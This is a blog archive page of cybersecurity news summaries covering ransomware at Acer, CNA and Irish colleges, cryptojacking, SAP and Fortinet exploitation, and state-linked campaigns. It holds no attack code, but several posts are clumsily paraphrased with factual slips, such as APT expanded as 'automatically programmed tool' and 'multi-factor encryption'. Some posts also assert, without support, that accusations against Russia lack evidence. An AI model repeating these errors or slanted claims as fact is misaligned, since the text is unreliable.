Search This Blog

Showing posts with label Cyber Attacks. Show all posts

Cybersecurity experts warned of a possible attack on Russian accounts in May

DeviceLock, a company engaged in the fight against data leaks, warned of the preparation of an attack on the accounts of Russians during the May holidays due to the sale of access to the switch of one of the mobile operators on the Darknet. 

In particular, it is reported that in early March a proposal appeared on the Darknet to sell access to the switch of one of the mobile operators, the connection to which allows to intercept control over the SS7 signaling system, which controls the traffic of mobile operators.

The experts said that they were asking $30,000 for access to the switch, so the purchase only makes sense if the hacker attack is being prepared on a large scale, capable of recouping the expense.

"Since attackers usually need from two weeks to a month to prepare an attack of this type, it can be timed to May holidays, when most Russians will loosen control over their accounts and other financial assets," summarized Olesya Yarmolenko, general director of Smart Line Inc (DeviceLock systems manufacturer).

According to her, this operator most likely has a cooperation agreement with one or more Russian cellular service providers. At the same time, according to DeviceLock data, in early April access to the switch could have reached the buyer from the CIS countries, and due to the active spread of online banking and relatively high account balances, Russia has always been the most desirable target for fraudsters on the Internet.

Sergey Nenakhov, head of the information security audit department at Infosecurity a Softline company, explained that the clients should switch the two-factor protection of critical services to push notifications instead of SMS, and also use special authenticator applications which generate one-time codes directly on the device itself.

It is also specified that VTB is aware of the risks of attacks on citizens through interception of messages, but the bank assured that the adopted set of technical measures does not allow attackers to use the technology to gain access to the clients' funds.

At the same time, representatives of mobile operators did not respond to inquiries about the risks of attacks through the SS7 standard.

Cryptojacking Spree: Targeting Washington State Educational Institutions

 

According to a new advisory released by Palo Alto Network's Unit 42 team, recently, cryptojacking incidents have taken place against educational institutions in Washington State. Threat actors are targeting educational institutions in the United States intending to compromise their networks and mine cryptocurrency covertly. 

Otherwise known as cryptojacking attacks, this is a form of cyberattack in which attackers use deception tactics to install cryptocurrency mining components that leech off of computational power without being noticed or detected. 

On February 16, cybersecurity researchers discovered the first attack, which consisted of a malicious HTTP request sent to a domain owned by an educational institution. Security teams initially mistook it for a trivial command injection flaw, but it turned out to be a command for a web shell backdoor that attackers used to gain access to the institution's network. 

In this form of attack, attackers use various types of miner software to try to generate cryptocurrencies such as Monero, Litecoin, Bitcoin, and Ethereum. Attackers typically compromise a large number of systems to make the attacks lucrative and bring in more cryptocurrency. 

The researchers say that a UPX-packed cpuminer -- used to mine LTC and BTC -- has been delivered by way of malicious traffic. 

If deployment is successful, the backdoor is then able to call and execute the crypto mining payload. Besides, the malware will download a mini shell that pretends to be a wp-load.php file. "Since the mini shell is not moved elsewhere, we speculate that the current directory of the mini shell, as well as the backdoor, is a web directory exposed to the internet," the report states. 

Cryptocurrency mined on infected systems is sent to two wallets owned by the operators (1,2). In two other incidents, there were some differences when it came to user agent strings, pass values, and algorithms, but the general attack method remained the same. 

"The malicious request [...] exhibits several similarities," Unit 42 noted. "It's the same attack pattern delivering the same cpuminer payload against the same industry (education), suggesting it's likely the same perpetrator behind the cryptojacking operation."

An analysis of K-12 schools across the United States revealed in March that 2020 is a "record-breaking" year for cybersecurity incidents. Over 400 incidents were reported in the study, including ransomware, phishing attempts, website defacement, and denial-of-service (DoS) attacks.

Cring Ransomware Attacks Exploited Fortinet Flaw

 

Ransomware operators shut down two production facilities having a place with a European manufacturer in the wake of conveying a relatively new strain that encrypted servers that control a manufacturer's industrial processes, a researcher from Kaspersky Lab said on Wednesday. Threat actors are abusing a Fortinet vulnerability flagged by the feds a week ago that conveys a new ransomware strain, named Cring, that is targeting industrial enterprises across Europe. 

Researchers say the attackers are misusing an unpatched path-reversal flaw, followed as CVE-2018-13379, in Fortinet's FortiOS. The objective is to access the victim's enterprise networks and eventually convey ransomware, as indicated by a report by Kaspersky Lab. “In at least in one case, an attack of the ransomware resulted in a temporary shutdown of the industrial process due to servers used to control the industrial process becoming encrypted,” Kaspersky senior security researcher Vyacheslav Kopeytsev wrote in the report. 

Cring is relatively new to the ransomware threat scene—which as of now incorporates prevailing strains REvil, Ryuk, Maze, and Conti. Cring was first noticed and revealed by the analyst who goes by Amigo_A and Swisscom's CSIRT team in January. The ransomware is one of a kind in that it utilizes two types of encryption and annihilates backup files to threaten victims and keep them from retrieving backup files without paying the ransom. A week ago, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) cautioned that nation-state advanced persistent threat (APT) groups were effectively abusing known security vulnerabilities in the Fortinet FortiOS operating system, influencing the organization's SSL VPN items. 

In its report, Kaspersky echoed the feds cautioning adding attackers are first scanning connections with Fortinet VPNs to check whether the software utilized on the gadget is the vulnerable version. The objective is to crack open affected hardware, give adversaries admittance to network credentials, and build up traction in the targeted network, Kopeytsev clarified. “A directory-traversal attack allows an attacker to access system files on the Fortigate SSL VPN appliance,” he wrote. “Specifically, an unauthenticated attacker can connect to the appliance through the internet and remotely access the file ‘sslvpn_websession,’ which contains the username and password stored in cleartext.”

IT Services Remain Disrupted At Two Colleges Of Ireland After Ransomware Attacks

 

Two IT universities of Ireland the National College of Ireland (NCI) and the Technological University of Dublin have been hit by a cyber attack. 

Recently, both the aforementioned universities have reported ransomware attacks on their system. Currently, the National College of Ireland is working 24 hours to restore its IT services after suffering a massive cyber attack. Consequently, the institution is forced to go with an offline IT system. 

"NCI is currently experiencing a significant disruption to IT services that have impacted a number of college systems, including Moodle, the Library service, and the current students’ MyDetails service," the college reported on Saturday. 

An advisory that has been released by some press institutions said that two third-level institutions that are experiencing cyber-attacks, particularly ransomware attacks – in their regard, there is no definite timeline for when the IT services will be fully restored. 

In the wake of the attack, the two institutions have immediately notified the students, staff, and other employees, about the cyber attacks. Subsequently, NCI’s IT suspended access to the systems and the campus building was also shut down for staff as well as the students until the IT services are fully recovered from the attacks. 

NCI has also notified the important inquiries pertaining to the attack, to the authorities including the national police service of the Republic of Ireland and the Data Protection Commissioner. 

"Please note that all classes, assessments, and induction sessions planned from today Tuesday 6th until this Thursday 8th April inclusive have been postponed and will be rescheduled for a later date," NCI added in a statement issued today. 

"…The College will issue a further update on Thursday afternoon in relation to classes and other events for Friday and beyond. As well as, Students with assignments due this week were told that "no late penalties will be applied while the outage remains in place." 

Meanwhile, students were also told not to access any system of the campus until Monday, April 12. They were also advised to avoid contacting the IT staff that is at present working on restoring attacked IT systems.

Russian intelligence was accused of cyber attacks on Lithuania's top leadership

Last year, hacker groups controlled by Russian secret services conducted cyber attacks on Lithuania's top leadership - This is stated in the annual report on the state of national cybersecurity published by the Ministry of Defense of the Baltic republic

The document claims that Lithuanian foreign policy and national security institutions, as well as energy and education facilities were attacked by Russian intelligence.

"Groups controlled by Russian intelligence services also used the Lithuanian information technology sector infrastructure for cyber attacks against targets in Western countries. For example, in July 2020, there were cyber attacks by the APT29 cyber group against organizations developing a coronavirus vaccine in the West that were carried out using Lithuanian IT infrastructure," the report said.

As noted in the document, some of the cyber incidents registered in the republic last year are associated with "political, geopolitical, strategic events in Lithuania, the region and around the world."

According to the report, "it is assumed that hostile intelligence services seek to illegally obtain information about vulnerabilities in Lithuanian communication and information systems, as well as personal user information (account login data) and use it for other cyber incidents".

As an example, a cyber attack was reported in December 2020, when 24 public sector websites were hacked, three of which published fake news with different content. An investigation into the incident revealed that it had been prepared in advance and was carried out in an orderly manner.

Various cyberattacks are often reported in Lithuanian state institutions. Most often they are attributed to "Russian hackers" or hinted that they were carried out by "unfriendly countries," although no evidence has been found.

Moscow has repeatedly stressed that accusations by Western partners are unfounded.

In addition, the authorities of the Baltic States have consistently obstructed the work of the Russian media. As the Russian Foreign Ministry noted, signs of coordination are clearly visible in the actions of Vilnius, Riga and Tallinn, and the cases of media harassment in the Baltic countries clearly demonstrate that the demagogic statements of these countries about their adherence to the principles of democracy and freedom of speech are worth in practice.

It's interesting to note that the report released by the Lithuanian Ministry of Defense shows that cyber incidents in Lithuania increased by 25 percent in 2020, and the number of incidents involving malware increased by 49 percent.

Active Cyber Attacks on Mission-Critical SAP Apps

 

Security researchers are warning about the arrival of attacks targeting SAP enterprise applications that have not been updated to address vulnerabilities for which patches are available, or that utilize accounts with weak or default passwords. 

Over 400,000 organizations worldwide and 92% of Forbes Global 2000 use SAP's enterprise apps for supply chain management, enterprise resource planning, product lifecycle management, and customer relationship management.

According to a study released jointly by SAP and Onapsis, threat actors launched at least 300 successful attacks on unprotected SAP instances beginning in mid-2020. Six vulnerabilities have been exploited, some of which can provide complete control over unsecured applications. Even though SAP had released fixes for all of these flaws, the targeted companies had not installed them or were using unsecured SAP user accounts. 

"We're releasing the research Onapsis has shared with SAP as part of our commitment to help our customers ensure their mission-critical applications are protected," Tim McKnight, SAP Chief Security Officer, said. 

"This includes applying available patches, thoroughly reviewing the security configuration of their SAP environments, and proactively assessing them for signs of compromise." Researchers also observed attackers targeting six flaws, these flaws, if exploited, can be used for lateral movement across the business network to compromise other systems. 

The threat actors behind these attacks have exploited multiple security vulnerabilities and insecure configurations in SAP applications in attempts to breach the targets' systems. In addition, some of them have also been observed while chaining several vulnerabilities in their attacks to "maximize impact and potential damage."

According to an alert issued by CISA, organizations impacted by these attacks could experience, theft of sensitive data, financial fraud, disruption of mission-critical business processes, ransomware, and halt of all operations. 

Patching vulnerable SAP systems should be a priority for all defenders since Onapsis also found that attackers start targeting critical SAP vulnerabilities within less than 72 hours, with exposed and unpatched SAP apps getting compromised in less than three hours. 

Both SAP and Onapsis recommended organizations to protect themselves from these attacks by immediately performing a compromise assessment on SAP applications that are still exposed to the targeted flaws, with internet-facing SAP applications being prioritized. 

Also, companies should assess all applications in the SAP environment for risk as soon as possible and apply the relevant SAP security patches and secure configurations; and assess SAP applications to uncover any misconfigured high-privilege user accounts.

"The critical findings noted in our report describe attacks on vulnerabilities with patches and secure configuration guidelines available for months and even years," said Onapsis CEO Mariano Nunez.

"Companies that have not prioritized rapid mitigation for these known risks should consider their systems compromised and take immediate and appropriate action" Nunez added.

Molson Coors "Cyberattack Incident" Could Cost Company $140 Million

 

The popular beer brands producers in the United States such as Molson Canadian, Coors Light, Miller Lite, Carling, Blue Moon, Coors Banquet, and many more, disclosed severe impacts of a cyberattack on their business, including brewery operations, production, and shipments. 

Brewing giant Molson Coors stated that the disruptive cyberattack led to a huge disruption in its brewery functioning operations and is going to cost the organization around $140 million. Additionally, Officials added that the company is working hard for its normalization: production and shipping have yet to reach normal operating levels. 

“Despite this progress led by the significant efforts of the Molson Coors team, along with the support of leading forensic information technology firms and other advisors, the Company has experienced and continues to experience some delays and disruptions in its business, including brewery operations, production, and shipments in the U.K., Canada, and the U.S.,” a March 26 statement reads. 

While the firm did not press a cause for what is being called a "cybersecurity incident”, but the occurrence comes amid a wave of malware and ransomware attacks that has a huge impact on companies worldwide. The recent cyberattack affected healthcare providers, computer producers- Acer, IoT provider Sierra Wireless and various other giants. 

The company stated that the cyber attack is going to impact its first quarter of business and consequently 2021 financial revenue as well, but the company has not released specific figures on expected costs. But, it is being observed that for the normal revenue company has to work hard and wait. 

According to the company, “the cybersecurity incident and the February winter storms in Texas will shift between 1.8 and 2.0 million hectoliters of production and shipments from the first quarter 2021 to the balance of the fiscal year 2021 and will also shift between $120 million to $140 million of underlying EBITDA from the first quarter 2021 to the balance of the fiscal year 2021.” 

The company is also yet to share its technical data regarding the cyber attack incident, but various experts are speculating that it could be ransomware-related cybercrime. 

“We notified law enforcement and are cooperating in their investigation. We also have notified and are working with all of our relevant insurance companies,” the company said in a statement.

Attackers found abusing GitHub Infrastructure to Mine Cryptocurrency

 

Microsoft-owned GitHub is the new cyberattack victim, with reports of cybercriminals manipulating GitHub's cloud infrastructure to mine cryptocurrency. Code repository hosting service, Github has started an investigation into a series of attacks aimed at abusing its infrastructure to mine cryptocurrency illegally. 

GitHub Actions is a continuous integration (CI) and continuous deployment (CD ) solution that makes it easy to automate all the software workflows and setup periodic tasks. The particular attack adds malicious GitHub Actions code to repositories forked from legitimate ones and further creates a Pull Request for the original repository maintainers to merge the code back, to alter the original code. 

“In a phone call, Dutch security engineer Justin Perdok told The Record that at least one threat actor is targeting GitHub repositories where Actions might be enabled. The attack involves forking a legitimate repository, adding malicious GitHub Actions to the original code, and then filing a Pull Request with the original repository in order to merge the code back into the original.” reported The Record. 

“But the attack doesn’t rely on the original project owner approving the malicious Pull Request. Just filing the Pull Request is enough for the attack, Perdok said.” This is particularly true for GitHub projects that have automated workflows setup to substantiate incoming Pull Requests via Actions. As soon as a Pull Request is created for the original project, GitHub's systems execute the attacker's code which instructs GitHub servers to retrieve and run a crypto miner. 

This isn't the first time an attack leveraging GitHub infrastructure has abused GitHub Actions. An identical attack had previously been identified by another programmer, Yann Esposito, in which an attacker had filed a malicious Pull Request against Esposito's GitHub project. 

Last year, BleepingComputer reported on GitHub being used to host a wormable botnet Gitpaste-12, which reappeared with over 30 exploits the following month. Unlike Gitpaste-12 or the Octopus Scanner malware, which targeted vulnerable projects and computers, this attack appears to be solely abusing on GitHub servers for crypto mining.

In an email, GitHub told The Record that they are “aware of this activity and are actively investigating”. For now, the attack does not appear to damage users’ projects in any way and seems to be solely focused on abusing GitHub infrastructure.

Medical Professionals of U.S. and Israel Targeted in a 'BadBlood' Phishing Campaign

 

Email security firm, Proofpoint has exposed a hacking group linked with the Iranian government targeting nearly two-dozen medical researchers in Israel and U.S. The targeted medical professionals particularly work in the oncology, genetics, and neurology fields in both U.S. and Israel. Proofpoint described the phishing campaign as ‘BadBlood’ due to its nature of targeting medical professionals.

According to Proofpoint, the Iranian hacking group operates with different names such as TA453, Charming Kitten, Phosphorus, APT35, ITG18, Ajax Security Team, NewsBeef, and Newscaster. The hacking group that has been operating since 2011, is specifically targeting medical professionals, activists, and journalists in the Middle East, the U.K., and the U.S. 

To lure the victims into their trap, the Iranian hacking group employed a Gmail account in the name of prominent Israeli physicist, Daniel Zaifman. The attackers sent a series of malicious emails from the Zaifman account to the medical professionals claiming to contain sensitive information on Israel’s nuclear program. 

The malicious emails contained a link that directed the victims to a fake Microsoft login page and once opened, the malicious links extracted the users’ email credentials. Although the motives of this attack is not yet clear, many researchers believe the operation was conducted to acquire medical research or private health data on intelligence targets of interest to Tehran. 

“While this campaign may represent a shift in TA453 targeting overall, it is also possible it may be an outlier, reflective of a specific priority intelligence tasking given to TA453. While targeting medical experts in genetics, neurology and oncology may not be a lasting shift in TA453 targeting, it does indicate at least a temporary change in TA453 collection priorities. BadBlood is aligned with an escalating trend globally of medical research being increasingly targeted by espionage motivated focused threat actors,” Proofpoint stated.

Live Broadcast Got Disrupted Due to Cyber-Attack on The Australian Tv Network- Nine

 

A cyber-attack on Australia's Channel Nine TV network has interrupted live broadcasts, raising questions about the country's exposure to hackers. ‘Weekend Today’, the broadcaster's Sunday morning news program that broadcasts from 7:00 a.m. to 1:00 p.m. from its Sydney headquarters, was also unable to air. In addition, the network's 5:00 p.m. newscast was also not broadcasted in Melbourne. 

The hack was being investigated as "criminal sabotage or the work of a foreign nation," according to Nine. On Sunday, Australia's parliament was looking into a potential cyber-attack in Canberra. Entry to IT and emails at Parliament House has been restricted as a precaution, according to Assistant Defense Minister Andrew Hastie. 

“We wish to inform you there has been a cyber-attack on our systems which has disrupted live broadcasts out of Nine Sydney,” reads an email sent by the company to staff. “Our IT teams are working around the clock to fully restore our systems which have primarily affected our broadcast and corporate business units.” 

The company reported that it had placed in position contingencies to ensure that its NRL and 6:00 pm news broadcasts would go ahead as scheduled. While the IT team has been working nonstop to fully restore their systems, that have mainly impacted their broadcast and corporate business units. The publishing and radio systems are still up and running. 

The broadcaster expressed optimism that the ‘Today Show’ would be able to resume with normal programming. Until further information, all employees have been requested to operate from home. Emails did not appear to be affected, according to the company, but the Nine IT network was. The company had previously reported that it was "responding to technical issues" that were impacting its live broadcasting. 

“Cyber hackers have targeted Channel Nine in a massive ransomware attack bringing down its network Australia-wide. No-one has claimed responsibility for the bug but IT experts are working to bring systems back on-line,” said Loxley. 

According to a source, Nine management had told staff that a "malicious" cyber-attack was suspected as the cause. The Australian Financial Review, which is also owned by Nine, also announced that the media group was possibly the victim of a cyber-attack, which could have long-term consequences.

CNA Hit by a Phoenix CryptoLocker Ransomware Attack

 

Insurance giant, CNA had to shut down its systems and temporarily close its website due to a novel ransomware attack. A new version of the Phoenix CryptoLocker malware was used in the attack, which happened earlier this week. The attack is believed to be linked to the Evil Corp hacking group. 

CNA, a Chicago-based company is the seventh-largest commercial insurance provider in the world. According to a statement published on the home page of the website on Sunday, March 21, the company affirmed that they have “sustained a sophisticated cybersecurity attack”. “The attack caused a network disruption and impacted certain CNA systems, including corporate email,” they added. 

Though CNA was the target of recent ransomware named Phoenix CryptoLocker, according to a report, the organization did not comment on the nature of the incident. CryptoLockers are a common form of ransomware that encrypts files on the computers it infects and demands a ransom from the victims in return for the key to decrypt them. 

As per the report, the cybercriminals behind Phoenix CryptoLocker are probably well-known groups, such as the cybercrime group Evil Corp, which lately reappeared after a short break from cybercrime. The effect of the group's most recent attack was so extreme that CNA detached its systems from its network "out of an abundance of caution" and is now offering workarounds for employees wherever possible so that the company can continue to service its customers, according to the company. The ransomware apparently encrypted data on over 15,000 machines on CNA's company network, as well as remote-working employees' computers who were connected to the company's VPN at the time of the attack. 

The ransomware appended ‘the.phoenix’ extension to encrypted files and generated a ransom note called ‘PHOENIX-HELP.txt’ while encrypting computers. Even though sources said CNA will restore from backups, the company has not verified anything. 

According to the report, based on similarities in the code from former ransomware used by Evil Corp, sources assume Phoenix CryptoLocker is a result of the same community. Evil Corp utilized WastedLocker ransomware to encrypt victims' files in past ransomware threats, such as the one against GPS technology provider Garmin last year. Indeed, the cybercriminal organization has made millions of dollars through several nefarious operations, including stealing banking credentials with the Dridex banking trojan and then making illicit money transfers from unsuspecting victims' bank accounts. 

The attack on CNA could also have a huge impact on certain businesses, particularly those who have cyber insurance policies with the organization. Hacking the insurer's network and stealing insurance details about their customers couldn't have been a better way to generate a list of insured companies to strike. It's uncertain if the cybercriminals stole unsecured files before encrypting CNA's devices at this point. However, since ransomware operations have made stealing unencrypted data a standard technique, it's possible that some data was stolen during the attack.

Ransomware Attacks Targeting UK’s Education Sector Increased, says NCSC

 

According to the warning by GCHQ's cybersecurity arm, NCSC, there has been a substantial spike in the number of ransomware attacks targeting the education sector over the last month, just as schools were getting ready to resume in-person classes. 

Ransomware attacks on the UK education sector have been on the rise, according to a new report. This includes developments seen in August and September 2020, along with attacks that have occurred since February 2021. It also offers mitigation recommendations to help in the defense of this sector. 

According to the report, senior leaders must recognize the magnitude of the threat and the ability of the ransomware to cause serious harm to their organizations in terms of information exposure and access to important services. 

Ransomware encrypts servers and files, making it impossible for businesses to provide services. Cybercriminals are anticipating that the need for schools and colleges to provide instruction would lead to target organizations succumbing to extortion requests and paying a bitcoin ransom in return for the decryption key required to recover the network. More importantly, cybercriminals have begun to warn that if the ransom is not paid, they will disclose confidential data taken from the network during the attack. Many elevated cases have arisen in which cybercriminals have carried out their attacks by exposing confidential data to the public, mostly via the darknet's “name and shame” websites. 

"In recent incidents affecting the education sector, ransomware has led to the loss of student coursework, school financial records, as well as data relating to COVID-19 testing," the agency said. 

Ransomware attacks can be crippling to businesses, taking a considerable period for victims to recover and restore vital services. These activities can also be high-profile in nature, gaining a lot of attention from the public and the media. 

There are many ways for ransomware attackers to gain entry to a victim's network. Remote Desktop Protocol (RDP) is one of the most commonly used protocols for remote desktop activities, according to the NCSC, allowing staff to access their office desktop computers or servers from a remote device over the internet. Ransomware attackers often use insecure RDP and virtual private networks (VPN) configurations to gain initial access to victims' computers. 

"This is a growing threat and we strongly encourage schools, colleges, and universities to act on our guidance and help ensure their students can continue their education uninterrupted", says NCSC. 

To protect against malware and ransomware threats, the NCSC suggests that businesses must adopt a "defense in depth" technique. Having an effective plan for vulnerability management and deploying security fixes, protecting remote web services with multi-factor encryption, and installing and activating anti-virus programs are all cybersecurity guidelines for schools, colleges, and universities to secure their networks from ransomware attacks. 

Great Britain named Russia as the main threat in cyberspace

 Lindy Cameron, executive director of Britain's National Cyber Security Center (NCSC), said on Friday that the Russian Federation poses the greatest threat to Britain in cyberspace.

According to her, as in any other area related to security, in cyberspace, Russia poses the most acute and urgent threat to the United Kingdom.

"We need to look carefully at China's ambitions for technological development. China will change the world we live in in a much more fundamental way than Russia," said Cameron.

Against the backdrop of the current world situation, she urged against complacency, complaining that cybersecurity is still not getting the attention it deserves. She also cited incidents involving cyberattacks against IT company SolarWinds and Microsoft Exchange service.

E Hacking News reminds that the NCSC is in charge of the Government Communications Center, the British intelligence agency responsible for conducting electronic reconnaissance and ensuring the protection of government and military information. The NCSC, in turn, works with the public and commercial sectors to respond to cyberattacks and to protect private and public information networks.

In December 2020, U.S. media reported that hackers linked to a foreign government hacked systems belonging to the U.S. Treasury Department, the Department of Homeland Security, the U.S. Commerce Department's National Telecommunications and Information Administration (NTIA), as well as networks at the Pentagon, Department of Energy and NNSA's nuclear safety agencies. A number of U.S. officials said the hacker group APT29 or Cozy Bear, allegedly linked to Russian intelligence, was likely behind the cyberattacks.

Later it became known that the cyberattack targeted SolarWinds, an IT company based in Austin, Texas. The hackers took advantage of the updates released by the company between March and June last year for its Orion software.

In March of this year, Microsoft warned that a hacker group allegedly backed by the Chinese government was exploiting security vulnerabilities in its Exchange Server messaging software, which is popular with U.S. agencies and companies.

Anonymous Hackers reportedly exposed the anti-Russian activities of the British Council

The Anonymous hacker group published an analysis of documents belonging to various British government agencies, including the Foreign Office, according to the local media reports. 

Anonymous previously accused British authorities and media organizations of influencing Russian-language media and attempting to shape the minds of their audiences in the way the West wants. In support of their position, the hackers published hundreds of copies of files that they called documents of the British Foreign and Parliamentary Ministries and organizations working for the authorities.

The analysis notes that the purpose of such manipulations is to change power in Russia and change the Kremlin's foreign policy.

It is also pointed out that the council is cooperating with British intelligence to be more effective.

The hackers noted the organization's activity in Russia's neighboring states: in the Caucasus, Moldova, Belarus and Ukraine.

"The British Council's operations in the Baltic States are well documented: they are designed to socially unite Russian-speaking communities in these countries, to make sure they have strong ties among themselves and feel an affinity with British and European values and culture, and are resistant to destabilizing narratives. Brilliant brainwashing," writes Anonymous.

The group cites photocopies of files to prove their claims, which include a call for proposals for communication in English in the South Caucasus, Moldova, and Belarus for fiscal years 2019-2022. Anonymous claims that it is a copy of the Foreign Ministry document, but there are no logos or markings on it to confirm this.

According to this document, the British State was willing to allocate 650,000 pounds per year for English language training in the regions, so the total cost of the three-year program should not exceed 1.95 million pounds.

However, according to Anonymous, the real purpose of the humanitarian programs of the British authorities in the post-Soviet space is "to break the foundations of the regime in Russia or to change its foreign policy".


Due to a Cyber Attack, MangaDex Website Taken Down for 2 Weeks

 

A few days ago, on 17th March, MangaDex found that a malicious actor, who already had access to an administrative account, had hacked the site. They said a malicious player has been able to access an administrative account by using a session token in an older database leak via flawed session management configuration. They further moved on to locate and patch the vulnerable section of code, also sweeping session data worldwide to prevent further attempts at, using the same technique. 

After the breach, they spent several hours analyzing the code and began patching. This occurred alongside the opening of the site following the breach, as we mistakenly believed that the actor could not access it. As a precaution, their infrastructure has been monitored in case the assailant is returned. 

Afterward, the attacker even sent an email with the "MangaDex has a DB leak. I suggest you tell their staff about it,” message to a few users according to the website's official notice. Since then, MangaDex has been maintaining the website and its users to prevent further disruption and security problems. 

Fortunately, MangaDex was pretty transparent regarding the violation and was providing information via Twitter instead of trying to hush up the details. However, the team recommends taking immediate actions to secure one’s online identity. Further, a database breach is also yet to be verified by them. So, if one uses the same password for all sites, they may want to change their passwords on other sites also. 

That being said, MangaDex affirmed that the new website — MangaDex v5 — will stay offline for a full rewrite that can take two weeks to complete. This decision took into consideration many other alternatives, such as the reintroduction of the website in its present state which could be vulnerable under MangaDex to further attacks. The new website will only have the basic features. This implies that only when MangaDex v5 is launched, users can read and upload and follow – like the website of the OG. 

The team confirmed that MangaDex v3 is back, though with several features that allow users to export bookmarks. A bug bounty program may also be developed for the team for v5. This helps MangaDex to patch all exploits in the code so that attackers will not be able to break the website.

Hackers used 11 Zero-Days to Attack Windows, iOS, Android Users

 

Malware trackers at Google keep on pointing out a complex APT group that burned through at least 11 zero-days exploits in less than a year to conduct mass spying across a range of platforms and gadgets. The group has effectively utilized "watering hole" assaults to divert explicit targets to a couple of exploit servers conveying malware on Windows, iOS, and Android gadgets. 

The cross-platform capacities and the readiness to utilize almost a dozen zero-days in under a year signals a well-resourced threat actor with the ability to access hacking tools and exploits from related groups. In another blog post, Google Project Zero researcher Maddie Stone released additional details on the exploit chains found in the wild last October and cautioned that the most recent disclosure is attached to a February 2020 campaign that incorporated the utilization of multiple zero-days. As per Stone, the threat actor from the February 2020 campaign went dark for a couple of months but returned in October with dozens of websites redirecting to an exploit server. 

“Once our analysis began, we discovered links to a second exploit server on the same website. After initial fingerprinting (appearing to be based on the origin of the IP address and the user-agent), an iframe was injected into the website pointing to one of the two exploit servers. In our testing, both of the exploit servers existed on all of the discovered domains,” Stone explained. 

The first exploit server at first reacted distinctly to Apple iOS and Microsoft Windows user-agents and was active for at least a week after Google's researchers began recovering the hacking devices. This server included exploits for a distant code execution bug in the Google Chrome rendering engine and a v8 zero-day after the underlying bug was fixed. Stone said the first server momentarily reacted to Android user-agents, proposing exploits existed for every one of the significant platforms.

Stone noticed that the assailants utilized a special obfuscation and anti-analysis check on iOS gadgets where those exploits were encrypted with ephemeral keys, “meaning that the exploits couldn't be recovered from the packet dump alone, instead of requiring an active MITM on our side to rewrite the exploit on-the-fly.”

Polish authorities got hacked for the sake of a fake allegation of nuclear waste leakage from Lithuania

Two Polish government websites were hacked to spread false information about a nuclear waste "leak" in neighboring Lithuania.

The incident took place on Wednesday. False information about a non-existent radioactive threat was published on the websites of the Polish National Atomic Energy Agency and the Polish Ministry of Health. In addition, the Twitter account of a journalist who "often writes about Russia and Eastern European countries" was hacked. His page was used to further spread misinformation.

The false statement said that the health and lives of Poles living near the Lithuanian border were in danger. However, the reports did not seem to get much attention.

Polish Security Service spokesman Stanislav Zarin said that "the whole story looked like a typical Russian attempt" to sow suspicion and discord among Western allies.

Zarin said he remembered a similar hacking attempt in 2020 that spread false information about a nonexistent radioactive cloud headed for Poland from Chernobyl in Ukraine.

In February, the Lithuanian Foreign Ministry drew attention to the recent intensification of information and cyber attacks aimed at damaging friendly Lithuanian-Polish relations and "blackmailing the Lithuanian and Polish peoples.

Official Vilnius and other Western countries regularly accuse the Russian side of "cyber attacks" without any evidence or concrete facts. Often Lithuanian politicians hint at the involvement of "Russian hackers" or that they were carried out by "unfriendly countries," although no evidence has been found.

As Russian authorities and experts have repeatedly noted, Moscow has no reason to attack Lithuania or other NATO countries, either real or virtual. Russia rejects all the accusations, noting that they are completely unfounded.

Electronics Giant Acer Hit by $50 MIllion Ransomware Attack

 

The ransomware gang known as ‘REvil’ stole confidential files from computer giant Acer and demanded an unprecedented ransom of US$50 million. The group also posted online images of allegedly stolen spreadsheets, bank balances, and bank texts, in order to prove their claims of having hacked into the Taiwan company’s network.

According to security researchers, hackers may have exploited a Microsoft Exchange vulnerability to gain entry into the company’s network. The $50 million demand of Acer is the largest-ever ransom demand to become publicly known, Callow said, larger than the $42 million REvil wanted from celebrity law firm Grubman Shire Mieselas & Sacks, who counted Nicki Minaj, Mariah Carey, and Lebron James among its clients. 

When asked about the situation, Acer wouldn’t admit that it was a ransomware attack, only telling Bleeping Computer in a statement that it has “reported recent abnormal situations observed to the relevant law enforcement and data protection authorities in multiple countries.” In the request for  further details, Acer replied, “there is an ongoing investigation and for the sake of security, we are unable to comment on details.” 

According to the Record’s report, Acer’s name appeared on the REvil ransomware group’s list of companies that do not pay extortion fees. With the help of malware intelligence analyst Marcelo Rivero, The Record managed to track down the gang’s other dark web portal, which clearly displayed the $50 million ransom the gang demands from Acer and the online chat the gang was using to communicate to the company’s representatives.

Before the attack, Advanced Intel’s Andariel cyberintelligence platform detected that the REvil gang recently targeted a Microsoft Exchange server on Acer’s domain and used the ProxyLogon vulnerability to install their ransomware.

Iranian Hacking Group Targets Several Middle East Companies Via Malicious Campaign

 

Security researchers at Trend Micro found proof of malicious activity by ‘MuddyWater’ automatically programmed tool (APT) that has aimed at Middle East organizations by utilizing the ScreenConnect remote management tool.

Security analysts at Trend Micro have dubbed ‘Earth Vetala’ the recently detected campaign. However, the latest finding expands on previous research published by Anomali last month. MuddyWater is an Iranian hacking group known for its offensives primarily against Middle Eastern nations.

Key findings from this investigation 

The details discovered by security researchers are listed below:

• The campaign is currently stealing all the credentials from browsers like Chrome, Chromium, Firefox, Opera, Internet Explorer, and Outlook. 

• The campaign is said to have leveraged spear-phishing emails containing embedded links to an authorized file-sharing service. 

• The goal of this campaign is to spread all the malicious packages that generally carry remote tools (ScreenConnect and RemoteUtilities) to manage all the enterprise systems remotely. 

Security researchers have discovered a spear phishing email supposedly from a government agency. However, these emails direct victims to a .ZIP file that contains a legitimate remote administration software developed by RemoteUtilities, which is capable of downloading and uploading files, capturing screenshots, browsing files and directories, and executing and terminating processes. 

Earth Vetala has been appropriating the post-exploitation that involves password/process- dumping tools, and customer backdoors. The threat actors have been perceived as instating communications with a command-and-control (C2) server to execute obfuscated PowerShell scripts. 

Security researchers at Trend Micro said the targets of the new wave of attacks are mainly organizations located in countries including Bahrain, Israel, Azerbaijan, Saudi Arabia, and the United Arab Emirates

In one particular instance involving a compromised host in Saudi Arabia, the researchers discovered that the adversary tried to unsuccessfully configure SharpChisel – a C# wrapper for a TCP/UDP tunneling tool called chisel – for C2 communications, before installing a remote access tool, a credential stealer, and a PowerShell backdoor capable of implementing arbitrary remote commands.

In just $16, Hackers May Steal User Data Via SMS Attack

 

Smartphone users are facing a new confidentiality and security risk as text messaging services are currently misused to secretly divert text messages from users to hackers, for only Rs 1,160 (nearly $ 16), allowing cybercriminals to control two-factor codes or SMS. The unreachable cyber-attack on SMS redirecting firms is carried out in conjunction with workers from telecommunications companies. 

